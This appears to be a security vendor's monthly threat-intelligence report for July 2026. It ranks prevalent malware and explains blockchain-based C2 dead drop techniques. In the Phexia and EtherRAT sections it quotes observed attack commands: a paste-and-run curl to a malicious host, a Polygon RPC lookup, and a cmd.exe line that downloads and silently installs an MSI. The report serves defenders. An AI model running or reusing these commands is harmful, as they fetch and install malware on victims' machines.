Highlights from July
For the fourth month in a row, ClearFake comes in number 1 on our top 10 most prevalent threat list. ClearFake is an activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste (aka paste and run, ClickFix, fakeCAPTCHA).
July 2026 saw a shakeup of our top 10 list, with familiar returns, notable departures, and four debuts:
- Returning in a tie for 4th is JustAskJacky, a family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory. In July 2026 we most frequently observed it masquerading as PDF readers. This is the first time JustAskJacky has made the top 10 since March 2026.
- Tied for 6th is Amber Albatross. It’s a cluster of activity, delivered via installers masquerading as legitimate free software, that progresses through several stages to a PyInstaller EXE with stealer capabilities. This is the first time Amber Albatross has made the top 10 since March 2026.
- Atomic Stealer, an information stealer designed to target data within web browsers and locally stored files on macOS systems, left the list for the first time since August 2025.
- NetSupport Manager, a legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access, fell out of the top 10 for the first time since September 2024.
- We had four new threats debut on our top 10 list this month: GraphSpy, Phexia, CastleRAT, and EtherRAT. You can read more about these threats, and some of the techniques they share, below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for July 2026:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⮕ 1 | Threat name: | Threat description : Activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste |
| Month's rank: ⬆ 2 | Threat name: | Threat description : Traffic distribution system (TDS) first observed in 2024 that uses compromised WordPress sites to deploy malicious code that may lead to malware |
| Month's rank: ⮕ 3 | Threat name: | Threat description : Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code |
| Month's rank: ⬆ 4* | Threat name: GraphSpy | Threat description : Open source initial access and post-exploitation tool that adversaries use to phish, steal, and abuse Entra ID and Microsoft 365 authentication tokens through a browser-based interface |
| Month's rank: ⬆ 4* | Threat name: | Threat description : Family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background |
| Month's rank: ⬆ 6* | Threat name: | Threat description : Cluster of activity, delivered via installers masquerading as legitimate free software, that progresses through several stages to a PyInstaller EXE with stealer capabilities |
| Month's rank: ⬇ 6* | Threat name: | Threat description : Traffic distribution system (TDS) first observed in 2024 that uses compromised WordPress sites to deploy malicious code that may lead to malware |
| Month's rank: ⬆ 6* | Threat name: | Threat description : macOS threat designed with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets |
| Month's rank: ⬆ 6* | Threat name: Phexia | Threat description : Combination remote access tool and stealer targeting macOS systems |
| Month's rank: ⬆ 10* | Threat name: CastleRAT | Threat description : Remote access trojan with several capabilities including keylogging, screen capturing, and remote shell access |
| Month's rank: ⬆ 10* | Threat name: EtherRAT | Threat description : Node.js-based RAT with blockchain-based C2 resolution that delivers multiple payload modules including credential theft, lateral movement, and web server hijacking |
| Month's rank: ⬆ 10* | Threat name: | Threat description : Malware family used as part of a botnet; some variants are worms and frequently spread via infected USB drives |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Four fresh faces: GraphSpy, Phexia, EtherRAT, CastleRAT debut
GraphSpy debuts in a tie for 4th
GraphSpy is an open source initial access and post-exploitation tool that adversaries use to phish, steal, and abuse Entra ID and Microsoft 365 authentication tokens through a browser-based interface. This is the third device code phishing tool to make the top 10 in 2026, following the similarly-named (but unrelated) GraphRunner in May 2026, and Kali365 in June 2026. GraphSpy runs a local web server that presents a browser-based GUI, which enables less technical adversaries to engage in Entra ID attacks. It centralizes a wide range of abuse techniques including the aforementioned device code phishing, primary refresh token (PRT) theft and abuse, Windows Hello for Business (WHFB) key registration, MFA method manipulation, and exfiltration of SharePoint, OneDrive, Outlook, and Teams data.
Mitigation recommendations for device code phishing activity include:
- Revoking the affected user’s refresh tokens and active sessions, reset the account credentials, and require re-authentication
- Restricting or blocking the device code authentication flow through Conditional Access policies for users and locations that do not require it
Phexia: Debuts in a tie for 6th
Phexia, a remote access tool and stealer targeting macOS systems, is new to the top 10 but is not new to Red Canary–we first began tracking it in November 2025. It has a modular approach, where the stealer bot components are not always distributed at the same time, allowing the author to introduce additional commands or modules as desired. The stealer component of Phexia is very similar to MacSync Stealer, due to it being partially modeled after MacSync. We’ve observed it distributed using malicious copy and paste to lure users into manually executing the malware, with commands like curl -A "Mac OS X 10_15_7" -fsSL gl1nto.spiintforge[.]ru/04jhdkq5. If successful, curl reached out to the remote resource in the command line, followed by osascript execution that created a LaunchAgent plist file which was configured to run a bash command containing a base64-encoded payload. Phexia also uses LaunchAgent persistence to ensure execution after reboots. The LaunchAgent’s ProgramArguments run a base64-encoded AppleScript payload through osascript on every launch, and the LaunchAgent sets both KeepAlive and RunAtLoad to true.
At the time of publication, Phexia is unique from other macOS stealers in its use of dead drop resolution with Telegram, Steam, and blockchain smart contracts to discover command and control (C2) domains for communication. The technique makes traditional C2 blocking challenging, since the URL can be updated dynamically by adversaries, allowing changes to propagate across installations and versions of the malware with little effort. We’ve seen Phexia query public Polygon (formerly known as MATIC) blockchain smart contracts to obtain C2 URLs. Phexia issued these requests across multiple redundant public Polygon RPC endpoints, decoded the contract’s ABI-encoded response to extract the URL, then POSTed a hardcoded transaction identifier to the resolved URL and piped the response directly into osascript for execution. In one example from July 2026, Phexia queried the smart contract at 0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0, with the command:
curl -s --max-time 15 hxxps[://]polygon[.]drpc[.]org -X POST -H 'Content-Type: application/json' --data '{"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0","data":"0x2686ecea"},"latest"],"id":1}'.
Mitigation recommendations for Phexia include:
- Blocking common blockchain traffic
- Removing any content referenced by the LaunchAgent
plistfile - Unloading the
plistplist fromlaunchd - Removing the
plistplist file from disk
CastleRAT: Debuts in a tie for 10th
CastleRAT is a remote access trojan with several capabilities including keylogging, screen capturing, and remote shell access. At the time of publication there are builds for both a compiled Python version and a C version of the malware. It leverages several currently popular techniques, including dead drop resolution via Pythonw, which beacons to adversary-controlled C2 domains or steamcommunity[.]com. It also leverages a Bring Your Own Runtime (BYOR) approach to its execution, bundling its own interpreter or runtime environment instead of relying on one already present on the system. CastleRAT has been delivered via other threats including CastleLoader, which debuted in our top 10 last month, and ClearFake. Detecting commonly used precursors to CastleRAT—for example, malicious copy and paste, and ClearFake—helps mitigate the threat of CastleRAT.
EtherRAT: Debuts in a tie for 10th
EtherRAT is a Node.js-based remote access trojan observed targeting Windows workstations via social engineering and Linux servers via exploitation of server-side vulnerabilities. First reported on Linux hosts in December 2025, EtherRAT uses a blockchain-based C2 dead drop resolution mechanism, an increasingly popular technique shared by other threats in this month’s top 10 list. The EtherRAT implant polls one or more public Ethereum RPC endpoints—entry points for querying the blockchain—to retrieve its current C2 URL, which is stored in a predefined smart contract address. EtherRAT’s capabilities include modules for credential theft, lateral movement, and web server hijacking. On Windows, adversaries have delivered EtherRAT by tricking victims into executing malicious copy and paste lures that silently installed a malicious Microsoft Installer (MSI) file, for example:
cmd.exe /v:on /c "set r=%RANDOM%... && curl -s -L -o C:\users\[redacted]\AppData\Local\!r!.msi reeemso[.]forwardbox[.]co[.]uk/132/ts.msi && msiexec /i ... /qn".
Once installed on a Windows host, EtherRAT executes while disguised as a configuration or data file using extensions like .ini, .tmp, or .dat. EtherRAT has also been reportedly distributed via RMM as a precursor to ransomware operations.
Mitigation and detection strategies for EtherRAT include:
- Considering whether QuickAssist use is common in your organization, and scrutinizing its use accordingly
- Looking for outbound comms to low prevalence domains
- TLS inspection, where available, can surface malicious C2 communications
New kids on the block(chain)
Dead drop resolution
The use of physical dead drops in spycraft—the practice of hiding information in a specific public location to reduce the contact between a protected information source and their handler—is also applicable in online espionage operations. Dead drop resolution is a technique used by adversaries to abuse trusted web services. They post malicious content to an ostensibly trusted web service–like Google Docs, GitHub repositories, or YouTube–that contains embedded, obfuscated, or encoded domains or IP addresses. Three of the threats in our top 10 this month use dead drop resolution as a technique:
- Phexia: Queries Polygon blockchain smart contracts
- CastleRAT: Calls out to adversary-controlled domains or
steamcommunity[.]com - EtherRAT: Polls public Ethereum RPC endpoints to read C2 URLs stored in smart contracts
Once malware using this technique is executed on an endpoint, it can query the site it’s been configured to reach out to, and use the returned information to locate its next stage or its C2 infrastructure. This isn’t a new technique; Operation Ghost Dukes, likely beginning in 2013, is frequently cited as one of the first reported uses of the technique in cyber espionage operations.
Traffic to popular websites and social media platforms like Google or Twitter is common in most environments, which makes malicious traffic harder to distinguish from normal activity. By relying on widely used services and websites, adversaries can reduce the visibility of their C2 infrastructure and make it more resilient. Because they don’t need to hard-code all the infrastructure information, adversaries can update infrastructure locations dynamically without changing the binary itself. This can help shield C2 infrastructure from discovery during malware analysis, and give operators the flexibility to rotate infrastructure as needed.
Mitigating dead drop resolver use:
- Leveraging network signatures via network detection and prevention systems can help identify malicious traffic for specific threats that use dead drop resolution as a technique.
- External network communication policies can be enforced via proxies that prevent the use of unauthorized external services.
- Blocking, restricting, or monitoring traffic to more commonly-abused services like Pastebin or Telegram, depending on your organization’s use of these services
EtherHiding
Three of the threats in our top 10 this month use EtherHiding:
- ClearFake
- Phexia
- EtherRAT
First reported in 2023, EtherHiding uses blockchain infrastructure to store, retrieve, or update data used in malicious activity. Instead of relying only on hardcoded domains or conventional web infrastructure, threats leveraging EtherHiding query public Remote Procedure Call (RPC) services, smart contracts, or transaction data. This is a form of dead drop resolver, one that leverages public blockchain infrastructure instead of the trusted web services as mentioned above. The returned information may point to a payload location, redirector, decryption key, or C2 endpoints. Despite the name, EtherHiding involves not only the Ethereum blockchain, but also Polygon, and BNB Smart Chain. By using public blockchain infrastructure to resolve operational data at runtime, adversaries can rotate infrastructure more easily and make static analysis and indicator-based detection more difficult.
EtherHiding begins with a threat delivered via a familiar vehicle; a compromised site, staged download, or trojanized package. After initial execution, the victim system performs a blockchain lookup, decodes or parses the returned value locally, and then contacts a next-stage payload host, redirector, or C2 endpoint.
Mitigating EtherHiding:
- Restricting or blocking direct access to blockchain services, if your organization does not have a legitimate need to access them; the public blockchain RPC endpoints highlighted on chainlist.org are a good place to start, as adversaries are more likely to leverage widely-used URLs instead of standing up their own infrastructure.
- If your organization does rely on blockchain services, mitigation becomes more dependent on baseline and context. Defenders should understand which users, systems, applications, and providers legitimately perform HTTPS-based blockchain RPC queries and then look for deviations outside those workflows.


